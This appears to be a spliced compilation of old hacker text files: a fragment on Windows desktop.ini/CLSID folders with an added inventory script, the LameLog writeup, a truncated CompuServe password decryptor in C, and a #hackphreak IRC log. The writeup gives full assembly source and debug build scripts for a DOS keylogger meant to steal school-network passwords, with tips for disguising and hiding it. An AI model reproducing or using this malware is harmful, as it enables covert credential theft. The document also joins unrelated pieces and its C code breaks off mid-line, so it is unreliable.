Recognise the layout? None of these are actually folders, and therefore do not have a desktop.ini file associated with them. For example, Control Panel is stored as a series of files named *.cpl in your \windows\system folder, which can all be accessed individually. The program which puts each of these components into their 'folder' is called control.exe and is located in the root of your windows folder. But searching for the string 'clsid' in your registry will spew out a lot of interesting material. Obviously you'll have to wade through all the crap to get to it, as a lot of information about the way that Windows operates is stored in this way.

The uses for these are practically limitless. Your sysadmin has probably limited access to most of this stuff, so you can just make yer own copies of the stuff. Having tried many ways of getting a definitive list of these files, I can say it's actually made pretty damn difficult for you. 'dir /s /ah desktop.ini' returns 2 files, and needless to say Windows Find is worse than useless; 'attrib /s > file.txt' and searching the file for the string desktop.ini gets most of them, but for some reason fails to locate some. Try them both to see what I mean. If anybody can get any better results than this, please contact me (ergophobe@dial.pipex.com).

And the moral: the registry holds the key (sorry, bad pun) to just about everything in Windows.
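The 'dir /s /ah' and 'attrib /s' attempts above are a hunt for exactly two things: hidden desktop.ini files carrying a CLSID/UICLSID line, and directories whose name ends in .{GUID}. The inventory script below covers both; it is an added example and not part of ergophobe's article. It runs offline against a throwaway tree it constructs itself (the Fonts and Recycle Bin GUIDs are the two quoted in this article, the folder names are made up), and inventory() can be pointed at a real drive for a sweep. From the admin's side, the same listing tells you which folders a user has cloned into shell namespace extensions.

```python
"""Inventory of shell-namespace folders (added example, not the article's code)."""
import os
import re
import tempfile

# Registry-style GUID as the article shows it: {8-4-4-4-12 hex digits}
GUID = r"\{[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12}\}"
CLSID_LINE = re.compile(r"^\s*(UICLSID|CLSID)\s*=\s*(" + GUID + r")\s*$",
                        re.IGNORECASE | re.MULTILINE)
CLSID_SUFFIX = re.compile(r"\.(" + GUID + r")$")

# GUIDs quoted in the article (Fonts folder and Recycle Bin).
FONTS_UICLSID = "{BD84B380-8CA2-1069-AB1D-08000948F534}"
RECYCLE_BIN_CLSID = "{645FF040-5081-101B-9F08-00AA002F954E}"


def parse_desktop_ini(text):
    """Return (key, guid) for the CLSID/UICLSID line of a desktop.ini, or None."""
    m = CLSID_LINE.search(text)
    return (m.group(1).upper(), m.group(2).upper()) if m else None


def inventory(root):
    """List (relative_dir, how, guid) for every shell-folder marker under root.

    how is 'UICLSID' or 'CLSID' when a hidden desktop.ini makes the folder
    special, and 'NAME' when the directory name itself carries a .{GUID} suffix.
    """
    found = []
    for dirpath, _dirs, files in os.walk(root):
        rel = os.path.relpath(dirpath, root).replace(os.sep, "/")
        m = CLSID_SUFFIX.search(os.path.basename(dirpath))
        if m:
            found.append((rel, "NAME", m.group(1).upper()))
        for name in files:
            if name.lower() != "desktop.ini":
                continue
            with open(os.path.join(dirpath, name), errors="replace") as fh:
                parsed = parse_desktop_ini(fh.read())
            if parsed:  # an ini without a CLSID line only sets icon/tooltip details
                found.append((rel, parsed[0], parsed[1]))
    return sorted(found)


def build_sample_tree(root):
    """Constructed sample data: one of each case plus two folders that must not match."""
    def ini(folder, body):
        os.makedirs(os.path.join(root, folder), exist_ok=True)
        with open(os.path.join(root, folder, "desktop.ini"), "w") as fh:
            fh.write(body)
    ini("Fonts", "[.ShellClassInfo]\nUICLSID=" + FONTS_UICLSID + "\n")
    ini("Docs", "[.ShellClassInfo]\nIconFile=folder.ico\nIconIndex=0\n")   # no CLSID
    bin_dir = os.path.join("Plain", "Bin." + RECYCLE_BIN_CLSID)            # both markers
    ini(bin_dir, "[.ShellClassInfo]\nCLSID=" + FONTS_UICLSID.lower() + "\n")
    os.makedirs(os.path.join(root, "Junk." + RECYCLE_BIN_CLSID))           # name only


def demo():
    """Build the sample tree in a temp directory and return the inventory."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return inventory(tmp)


if __name__ == "__main__":
    for rel, how, guid in demo():
        print(f"{rel:45} {how:8} {guid}")
```

The sort puts the two markers of a doubly-marked folder next to each other, which is the case worth a second look: a directory whose name already carries a GUID and whose desktop.ini points at a different class is not something the shell creates on its own.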
Leave no stone unturned.

ergophobe

╔═══════════════════════════════════════╗
║ ∙ ∙ ∙ ∙ ∙ ∙ ∙ ∙ ∙ ∙ ∙ ∙ ∙ ∙ ∙ ∙ ∙ ∙ ∙ ║
║ ∙          L A M E L O G          ∙ ║
║ ∙     b y   E X E - G e n c y     ∙ ║
║ ∙ ∙ ∙ ∙ ∙ ∙ ∙ ∙ ∙ ∙ ∙ ∙ ∙ ∙ ∙ ∙ ∙ ∙ ∙ ║
╚═══════════════════════════════════════╝

The two LameLog programs are key trapping programs. Key trapping is the process of hooking a keyboard interrupt, intercepting all the buttons pressed by the user and writing them to a file. Programs such as these are extremely useful for finding user names and passwords. I only wrote this lame program to get some passwords on my school network because I didn't have access to the internet at the time and therefore couldn't get hold of a decent key trapping program.

The first program (LAMELOG1) must be run before the login screen program and will keep a buffer of the keys pressed. The second program must be run after the security program and will write all of the keys to a file (test.log).

┌───────────────────┐
│ Interrupt hooking │
└───────────────────┘

As every assembly programmer should know, there are two different interrupts used to service the keyboard: INT 09h and INT 16h. INT 09h provides low level access and lets us detect 'special keys' like CTRL, ALT, SHIFT, CAPS LOCK etc. INT 16h provides a wide range of easy-to-use functions that allow high-level access to the keyboard. We will be installing our own INT 09h handler that will collect all key presses and dump them to a file. We will also be installing our own INT 21h handler, which lets us check memory residency and the position of the buffer in memory. Below is a list of the functions and return values for the two new interrupt handlers.

INT 21h  AX = F001h   returns AX = 1234h if LAMELOG1 is resident in memory.
INT 21h  AX = F002h   returns BX = Length of buffer
                              DX = Offset of buffer
                              ES = Segment of buffer

┌────────────────────────┐
│ Using the two programs │
└────────────────────────┘

Simply call LAMELOG1 before the security program, and LAMELOG2 after it.
For example, the AUTOEXEC.BAT file would be:

@echo off
keyb
mouse
(etc)
cd\
lamelog1
security software
lamelog2

Make sure that the two files are either in the root directory or in one that is included in the system PATH, or there will be a few 'bad command or filename' messages on boot-up. It would also be a good idea to rename the two files to something less suspicious, such as keyboard drivers etc., as well as giving them the ATTRIB +H treatment. Before the program can work successfully, there must be a file called TEST.LOG in the root directory. After a few boot ups, open the file using a hex editor, and you will be able to see all scan codes for key presses.

If you've got access to the system files then the security must be pretty shite and you have nothing to gain by using other people's passwords. You should, however, remember that a user may be using the same logon password as that for a Unix account, ISP account etc.

The only knowledge I have of assembly language has been gathered by reading virus programming tutorials and source codes. It is for this reason that many of the techniques used (especially the interrupt hooking, interrupt handling and residency calls) resemble viral code and will trigger heuristic AV programs.

Have fun and don't get caught.

Um! When reading keys from the keyboard port, you don't get nice ASCII numbers (like 65 for A etc.) but complex scan codes instead. It is not immediately obvious what these codes represent, so I've included a table of the most common key presses. The first hex byte is the code generated when the key is pressed, while the second byte corresponds to the code generated when the key is released.
a  1Eh 9Eh  |  n  31h B1h  |  1  02h 82h
b  30h B0h  |  o  18h 98h  |  2  03h 83h
c  2Eh AEh  |  p  19h 99h  |  3  04h 84h
d  20h A0h  |  q  10h 90h  |  4  05h 85h
e  12h 92h  |  r  13h 93h  |  5  06h 86h
f  21h A1h  |  s  1Fh 9Fh  |  6  07h 87h
g  22h A2h  |  t  14h 94h  |  7  08h 88h
h  23h A3h  |  u  16h 96h  |  8  09h 89h
i  17h 97h  |  v  2Fh AFh  |  9  0Ah 8Ah
j  24h A4h  |  w  11h 91h  |  0  0Bh 8Bh
k  25h A5h  |  x  2Dh ADh  |
l  26h A6h  |  y  15h 95h  |
m  32h B2h  |  z  2Ch ACh  |

space      39h B9h
enter      1Ch 9Ch
shift      2Ah AAh
backspace  0Eh 8Eh

For example, should someone press 'S' three times, then hold down 'T', then press enter, you would get:

1F 9F 1F 9F 1F 9F 14 14 14 14 14 94 1C 9C
└ S ┘ └ S ┘ └ S ┘ └────── T ──────┘ └ENT┘

If you want to know the scan codes for keys other than those listed above (such as F1-F12, cursor keys) you'll have to experiment by yourself.

Warranty notice: I cannot stress how buggy and lame these two programs are. If you want a decent key trapping program, for God's sake, go and find one on the internet. All of the ones I've seen on the internet since writing this program were much better.

┌─────────────────────────────────────────────────┐
│ L A M E L O G 1 . A S M   s o u r c e   c o d e │
└─────────────────────────────────────────────────┘

; To compile:
; TASM LAMELOG1
; TLINK /T LAMELOG1

prog            segment
                assume cs:prog, ds:prog
                org 0100h

ProgStart:      jmp GoResident                  ; Jump past INT 09h handler

NewInt09hHand:  pushf                           ; Save flags register
                push bp                         ; Save BP
                push ax                         ; Save AX
                push bx                         ; Save BX
                push cx                         ; Save CX
                push dx                         ; Save DX
                push ds                         ; Save DS
                push es                         ; Save ES
                push cs                         ; Save CS
                push cs                         ; Save CS
                pop ds                          ; Pop CS to DS
                pop es                          ; Pop CS to ES
                in al, 60h                      ; Read character from keyboard port
                mov bp, BufferLength            ; Put buffer length into BP
                mov byte ptr Buffer[bp], al     ; Put AL (char) into array
                inc bp                          ; BP++
                cmp bp, 1000                    ; If BP=1000 (end of the 1000-byte buffer)...
                jne UpdateBufferLen
                mov bp, 00h                     ; ...wrap BP back to zero
UpdateBufferLen:mov BufferLength, bp            ; Move BP to BufferLength
                pop es                          ; Restore ES
                pop ds                          ; Restore DS
                pop dx                          ; Restore DX
                pop cx                          ; Restore CX
                pop bx                          ; Restore BX
                pop ax                          ; Restore AX
                pop bp                          ; Restore BP
                popf                            ; Restore flags
OldInt09hHand:  db 0EAh                         ; Code for JMP FAR
OldInt09hOff    dw 0000h                        ; Offset of old INT 09h handler
OldInt09hSeg    dw 0000h                        ; Segment of old INT 09h handler

NewInt21hHand:  pushf                           ; Push flags
                cmp ax, 0F001h                  ; If AX=F001h (Residency check)
                jne NextFunction                ; Check for next function
                mov ax, 1234h                   ; Return 1234h to calling program
                popf                            ; Restore flags
                iret                            ; Return to calling program
NextFunction:   cmp ax, 0F002h                  ; If AX=F002h (Get segment/offset etc.)
                jne OldInt21hHand               ; Jump to old handler
                                                ; Return Seg and Offset of buffer data
                push ds                         ; Save DS
                push cs                         ; Save CS
                pop ds                          ; Restore CS in DS
                mov bx, word ptr BufferLength   ; Move buffer length to BX
                mov dx, word ptr BufferOffset   ; Move buffer offset to DX
                mov es, word ptr BufferSegment  ; Move buffer segment to ES
                pop ds                          ; Restore DS
                popf                            ; Restore flags
                iret                            ; Return to calling program
OldInt21hHand:  popf                            ; Restore flags
                db 0EAh                         ; Code for JMP FAR
OldInt21hOff    dw 0000h                        ; Offset of old INT 21h handler
OldInt21hSeg    dw 0000h                        ; Segment of old INT 21h handler

BufferSegment   dw 0000h                        ; Segment of key buffer
BufferOffset    dw 0000h                        ; Offset of key buffer
BufferLength    dw 0000h                        ; Length of key buffer
Buffer          db 1000 dup(0)                  ; Buffer (maximum of 1000 characters)

GoResident:     mov ax, 0F001h                  ; Check if LAMELOG1 is already resident
                int 21h                         ; Call DOS interrupt
                cmp ax, 1234h                   ; If AX==1234h then LAMELOG1 is already TSR
                je Exit                         ; ...and therefore end program
                push cs                         ; Save CS register
                pop ds                          ; Restore CS register into DS
                mov BufferSegment, ds           ; Move DS to BufferSegment
                lea ax, Buffer                  ; Load address of Buffer to AX
                mov BufferOffset, ax            ; Store AX in BufferOffset
                mov ax, 3509h                   ; Get current Seg/Off of current 09h handler
                int 21h                         ; Call DOS interrupt
                mov OldInt09hOff, bx            ; Move old INT 09h Off to OldInt09hOff
                mov OldInt09hSeg, es            ; Move old INT 09h Seg to OldInt09hSeg
                mov ax, 3521h                   ; Get current Seg/Off of current 21h handler
                int 21h                         ; Call DOS interrupt
                mov OldInt21hOff, bx            ; Move old INT 21h Off to OldInt21hOff
                mov OldInt21hSeg, es            ; Move old INT 21h Seg to OldInt21hSeg
                mov ax, 2509h                   ; Set new INT 09h
                lea dx, NewInt09hHand           ; DX=Offset of NewInt09hHand
                int 21h                         ; Call DOS interrupt
                mov ax, 2521h                   ; Set new INT 21h
                lea dx, NewInt21hHand           ; DX=Offset of NewInt21hHand
                int 21h                         ; Call DOS interrupt
                lea dx, ProgramEnd              ; Set DX to end of program
                int 27h                         ; Go TSR
Exit:           int 20h                         ; Return to operating system

ProgramInfo     db 'LameLog1 written by EXE-Gency'
ProgramEnd:
prog            ends
                end ProgStart
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ L A M E L O G 1 d e b u g s c r i p t ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ If you don't have TASM and TLINK, just copy the following to a text file and type: debug < filename and a file called 'lamelog1.com' will appear N LAMELOG1.COM E 0100 E9 48 04 9C 55 50 53 51 52 1E 06 0E 0E 1F 07 E4 E 0110 60 8B 2E 61 01 3E 88 86 63 01 45 81 FD E9 03 75 E 0120 03 BD 00 00 89 2E 61 01 07 1F 5A 59 5B 58 5D 9D E 0130 EA 00 00 00 00 9C 3D 01 F0 75 05 B8 34 12 9D CF E 0140 3D 02 F0 75 12 1E 0E 1F 8B 1E 61 01 8B 16 5F 01 E 0150 8E 06 5D 01 1F 9D CF 9D EA 00 00 00 00 00 00 00 E 0160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 01A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 01B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 01C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 01D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 01E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 01F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 02A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 02B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 02C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 02D0 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 E 02E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 02F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0300 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0310 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0320 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0340 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0350 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0360 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0370 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0380 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0390 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 03A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 03B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 03C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 03D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 03E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 03F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0400 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0410 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0420 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0430 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0440 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0450 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0460 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0470 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0480 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0490 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 04A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 04B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 04C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 04D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 04E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 04F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0500 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0510 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0520 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0530 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0540 00 00 00 00 00 00 00 00 00 00 00 B8 01 F0 CD 21
E 0550 3D 34 12 74 3B 0E 1F 8C 1E 5D 01 B8 63 01 A3 5F
E 0560 01 B8 09 35 CD 21 89 1E 31 01 8C 06 33 01 B8 21
E 0570 35 CD 21 89 1E 59 01 8C 06 5B 01 B8 09 25 BA 03
E 0580 01 CD 21 B8 21 25 BA 35 01 CD 21 BA AF 05 CD 27
E 0590 CD 20 4C 61 6D 65 4C 6F 67 31 20 77 72 69 74 74
E 05A0 65 6E 20 62 79 20 45 58 45 2D 47 65 6E 63 79
RCX
04AF
W
Q

┌─────────────────────────────────────────────────┐
│ L A M E L O G 2 . A S M   s o u r c e   c o d e │
└─────────────────────────────────────────────────┘

; To compile:
; TASM LAMELOG2
; TLINK /T LAMELOG2

prog            segment
                assume cs:prog, ds:prog
                org 0100h

ProgStart:      mov ax, 0F001h                  ; Is LAMELOG1 resident?
                int 21h                         ; DOS interrupt
                cmp ax, 1234h                   ; If AX==1234h then LAMELOG1 is resident
                je OpenFile                     ; then jump to 'OpenFile' label
                mov ah, 09h                     ; 09h==DOS function to write to screen
                lea dx, NotResident             ; DX==Offset of 'No TSR!' message
                int 21h                         ; Call DOS interrupt
                jmp Exit                        ; Jump to end of program

OpenFile:       mov ah, 3Dh                     ; 3Dh==DOS function to open file
                mov al, 02h                     ; Open file for writing (read/write access)
                lea dx, LogFilename             ; DX==Offset of filename 'TEST.LOG'
                int 21h                         ; Call DOS interrupt
                jnc SeekEOF                     ; If no error then jump to label 'SeekEOF'
                mov ah, 09h                     ; DOS function to write to screen
                lea dx, BadFile                 ; DX==Offset of 'Bad file!' text string
                int 21h                         ; Call DOS interrupt
                jmp Exit                        ; Jump to end of program

SeekEOF:        xchg bx, ax                     ; Move file handle from AX to BX
                mov ah, 42h                     ; 42h==DOS function to seek position in file
                mov al, 02h                     ; 02h==EOF
                mov cx, 0000h                   ; Most significant part of offset
                mov dx, 0000h                   ; Least significant part of offset
                int 21h                         ; Call DOS interrupt

WriteStart:     mov ah, 40h                     ; 40h==DOS function to write to file
                mov cx, 09h                     ; CX==Number of bytes to write
                lea dx, StartString             ; DX==Offset of 'START' string
                int 21h                         ; Call DOS interrupt
                push bx                         ; Save file handle for a moment
                mov ax, 0F002h                  ; Get Seg/Offset/Length of buffer from
                                                ; LameLog1 program resident in memory
                int 21h                         ; Call DOS interrupt
                                                ; bx=BufferLength
                                                ; es=BufferSegment
                                                ; dx=BufferOffset
                mov cx, bx                      ; Move length of buffer into CX
                pop bx                          ; Restore file handle from stack
                push ds                         ; Save DS register
                push es                         ; Push ES register to stack
                pop ds                          ; Restore ES into DS (mov ds, es)
                mov ah, 40h                     ; Write to file
                int 21h                         ; DOS interrupt
                pop ds                          ; Restore DS register
                mov ah, 3Eh                     ; 3Eh==Close file
                int 21h                         ; Do it.
Exit:           int 20h                         ; Call int 20h (return to OS)

NotResident     db 'No TSR!$'
BadFile         db 'Bad file!$'
StartString     db 0Dh, 0Ah, 'START', 0Dh, 0Ah
LogFilename     db 'test.log', 00h
ProgramInfo     db 'LameLog2 written by EXE-Gency'
prog            ends
                end ProgStart

┌───────────────────────────────────────────┐
│ L A M E L O G 2   d e b u g   s c r i p t │
└───────────────────────────────────────────┘

If you don't have TASM and TLINK, just copy the following to a text file and type:

debug < filename

and a file called 'lamelog2.com' will appear.

N LAMELOG2.COM
E 0100 B8 01 F0 CD 21 3D 34 12 74 0A B4 09 BA 57 01 CD
E 0110 21 EB 42 90 B4 3D B0 02 BA 72 01 CD 21 73 0A B4
E 0120 09 BA 5F 01 CD 21 EB 2D 90 93 B4 42 B0 02 B9 00
E 0130 00 BA 00 00 CD 21 B4 40 B9 09 00 BA 69 01 CD 21
E 0140 53 B8 02 F0 CD 21 8B CB 5B 1E 06 1F B4 40 CD 21
E 0150 1F B4 3E CD 21 CD 20 4E 6F 20 54 53 52 21 24 42
E 0160 61 64 20 66 69 6C 65 21 24 0D 0A 53 54 41 52 54
E 0170 0D 0A 74 65 73 74 2E 6C 6F 67 00 4C 61 6D 65 4C
E 0180 6F 67 32 20 77 72 69 74 74 65 6E 20 62 79 20 45
E 0190 58 45 2D 47 65 6E 63 79
RCX
0098
W

/*********************************************************************
 *                                                                   *
 * COMPPASS.C by EXE-Gency                                           *
 * A program to find the compuserve password on a windows machine by *
 * searching the C:\WINDOWS directory for the CIS.INI file that      *
 * contains the encrypted password. The encryption routine was taken *
 * from an old file by Gnasher from the Electronic Terrorism Group.  *
 *                                                                   *
 * If you want to compile the source code yourself you'll need a     *
 * copy of DJGPP:                                                    *
 *                                                                   *
 * GCC -o COMPPASS.EXE COMPPASS.C                                    *
 *                                                                   *
 *********************************************************************/

#include "stdio.h"
#include "process.h"
#include "string.h"
#include "ctype.h"

unsigned int GetDec(char C[2]);   // Function that returns the integer value
                                  // of a two character hex digit

int main()
{
    FILE *File;
    char String[200], *Ptr1, *Ptr2;
    unsigned int Counter1, Decimal;
    char TwoChar[2];
    unsigned char Key[24]={198,253,199,161,237,251,   // Keys for each char
                           182,254,227,219,245,190,
                           186,239,221,247,171,198,
                           253,199,161,237,251,182};

    printf("COMPPASS v1.0 EXE-Gency. Program to get compuserve password.\n");
    if((File=fopen("CIS.INI", "r"))==NULL) {
        // Can't open file CIS.INI in current directory for reading
        printf("Cannot find file CIS.INI in current directory!\n");
        printf("Aborted");
        exit(1);                                  // Quit to OS
    }
    while(!feof(File)) {
        fgets(String, 199, File);                 // Read string
        Ptr1=strstr(String, "Password");          // Is 'Password' in string?
        if(!(Ptr1-String)) {                      // Yep!
            printf("Encrypted %s", String);
            Ptr1=String;
            Ptr2=String;
            Ptr1+=9;
            while(*Ptr1) {                        // Copy string
                *Ptr2=*Ptr1;
                Ptr1++;
                Ptr2++;
            }
            *Ptr2=*Ptr1;
            printf("True Password=");
            for(Counter1=0; Counter1

Hi is there any exploit for FTP'S? yeah you can use an anonymous login to get the password file on some UNIX boxes I did that but, is shadowed. and I can't get the shadow passwd file spank it thats your only chance with a big ugly stick spank it true spank? yeah you never heard of the spank technique? you some kinda lamer? never man ?? nope shit dood spanking is the ultimate in teqneek hells yeh *** BL4Z3 has joined #hackphreak that's why I don't know that technique cause I have a lot of time out oh now Im here again heh oh well take a lot of time, especially the monkey spanking teqneek when I find text's about that? ohhh thats the ultimate in spank tecnoloG HuSoft, you think you can learn how to spank your monkey?
I can learn whatever *** BL4Z3 has quit IRC (Leaving_) cool I think theres even an rfC file on the spank teknique and where can I find it? *** dork has quit IRC (quitting.c_) well, it's quite easy to find really yeah? go to www.lamer.com I think it's there nerd, would you agree with that? yeah definately oh nerd it's there in there text section no it's a real site for learning shit ok yeh go there yeh, real shit click on there text file like like=link ok and look for rfc666 *** tofus has joined #hackphreak or it might have been rfc 420 yeh, that sounds right, though i heard the nsa were going to classify the rfc fuck the nsa their wimps they're even ;p *** niscii has joined #hackphreak * tofus 0wns the nsa *** Zio has joined #hackphreak *** W sets mode: +o Zio tofus, we were discussing the rfc on the spanking teqneek hey nerd, there is all about MP3! hmmm aha the spanking teqneek yes *** rUdi^baiK has quit IRC (Ping timeout for rUdi^baiK[p-h-h.com]_) ph33r my kungfu 5k1LL2 maybe that wasnt the site specifically relating to monkey spanking, HuSoft is going to learn to spank the monkey yeah it complicated tho he needs an rfc for it that sucks, dude! yeah oh well I can't rerally remember the site maybe it was www.lamour.net or something........ try shit like that or lamer.co.uk dudes, gotta hover...gotta catch a train surf.to/lamer I found it in other place nerd * tofus catches a train; 3 men out, changing sides *** tofus has left #hackphreak *** SEPULTURA has joined #hackphreak or, you could try the search engine on antionline.com, search for monkey spanking and you should get plenty of hits, a few of the antionline people are real monkey spankers anyone know something about POP3? I found it on YAHOO yeah.....it's by far the best technique *** helpmeplz has joined #hackphreak well read up man learn it well http://www.medismk.net/cgi-bin/vreme.pl ->Can someone tell me what is this and how can I brake into this ? 
as in can we all hack it for you no walrus, you should message HuSoft about the technique he is learning, it may help you oops http://www.medismk.net/html/login1.htm ->What about this can someone brake here ?? *** g_RaX has joined #hackphreak i ment to say helpmeplz, you should message HuSoft about the technique he is learning, it may help you thank you you are forgiven MOSSAD.ORG is workinh only on POP3 and HTTP anyone can help me to find backdoor? msg me well with HuSoft off spanking his monkey, we will need a new diverion *** niscii has left #hackphreak *** d0nt has joined #hackphreak *** AlphaVers has joined #hackphreak howdyz *** SEPULTURA has quit IRC (Ping timeout for SEPULTURA[RAS2-p110.rlz.netvision.net.il]_) *** dimak has joined #hackphreak hello huSoft I am here HuSoft is off spanking his monkey he's learning to. He's not quite mastered it true, he probably still hasn't quite come to grips with it yet he's learning how to spank his monkey? or did i miss something again? he will truly learn the value of in depth knowledge of the end knob and it's principal purpose can you help me with a problem? AlphaVers, no you got it right, he is learning to spank his monkey cool I heed to understand IPv4 address and find out the exact location of e person, can anyone help me? dimak, ask HuSoft about monkey spanking I heed to understand IPv4 address and find out the exact location of e person, can anyone help me? *** symbolik has joined #hackphreak uNFuNFuNF dimak, you also need to learn about themonkey spanking teqneek _i_nxs_,_ you got the log from that night? which nite? ? the one we were fightin in here think it was you hehe i doubt it i mean i doubt i have the log can you help me with the problem? msg husoft about the spank technique dimak, i told you, message HuSoft and ask him how to spank the monkey the spank technique covers a wide range of areas it's neat when people say they code and then they say things like this... 
[Letsdoit(letsdoit@209-145-180-74.accessus.net)] cobol assemblier fortran systems design to name a few *** CaPe-ZeD has joined #hackphreak *** W changes topic to 'Welcome to #HackPhreak, Lectures are currently on hold (hackphreak.org)_' makes me giggle makes me puke heh ya that too and i dont code i wish i had been logging tonite I am i could have spared a few meg for the idiocy of the evening i wish i logged period makes for funny bedtime stories wish i had been logging myself for the past week never been drunker in all my life has trav talked at all tonight? hrm no dang I heed to understand IPv4 address and find out the exact location of e person, can anybody help me? please dimak, have you learned how to spank your monkey yet? the spank technique cobers IPv4 as well as password files covers even i think it also has a primer on ipv6 and possibly location teqneeks using ipv4 its very versatile wait, dimak doesn't know the spank technique yet? http://www.medismk.net/html/login1.htm ->What about this can someone brake here it's linked to http://StNaum.medismk.net/cgi-bin/qqqq/login.cgi?? true that's why its so complex AlphaVers, doesn't look like it dude, that's basic knowledge you won't get nowhere without knowing it helpmeplz, you would make a good monkey spanker, you also should learn the teqneek if only JP was here, i am sure he would teach these peasants how to spank the monkey JP is a true sensei of monkey psanking spanking Dear, what am I to do? dimak, easy, learn how to spank where? mail jp@antionline.com about it he knows thanx inxs hey, good idea yeah. He's a really good spanker in fact, i think that will work *** genux has joined #hackphreak http://www.medismk.net/html/login1.htm ->What about this can someone brake here it's linked to http://StNaum.medismk.net/cgi-bin/qqqq/login.cgi?? 
you have to ask nice though, he doesn't like teaching so if you don't ask him right, he won't reply or feed you some bullshit next one to repeat a question, who has not availed themselves the oppurtunity to learn monkey spanking from JP, gets banned back in a bit, a rugby game on tv *** b00ze has joined #hackphreak ok I will mail him, but is it possible to know to decode IP right now? not without learning 'spank' hey people from #HACKPHREAK!!!!!!! RFC specifies an IAB standards track protocol for the Internet community, and requests discussion and suggestions for improvements. Please refer to the current edition of the "IAB Official Protocol Standards" for the standardization state and status of this protocol. Distribution of this memo is unlimited. heh ;) I found it you need an ip decoder, which requires knowledge of the spank technique to use ok yeah. You can code spank programs in BASIC hi ppl in order to decode an ip you need to know the spank level of it damn, maybe some can help me to understand just one IP address, I need it promtly, I need to hfind one my friend that's why you need to know how to spank right but spanking isn't for everyone..... spanking makes the difference between hackers and lamers yeah. Most girls are crap at spanking some people just can't handle it's raw power guys, can you decode the IP for me? sure, what is it? will it take much time? yeah. That's why it helps to write a spank program in BASIC nah not really it makes it easier 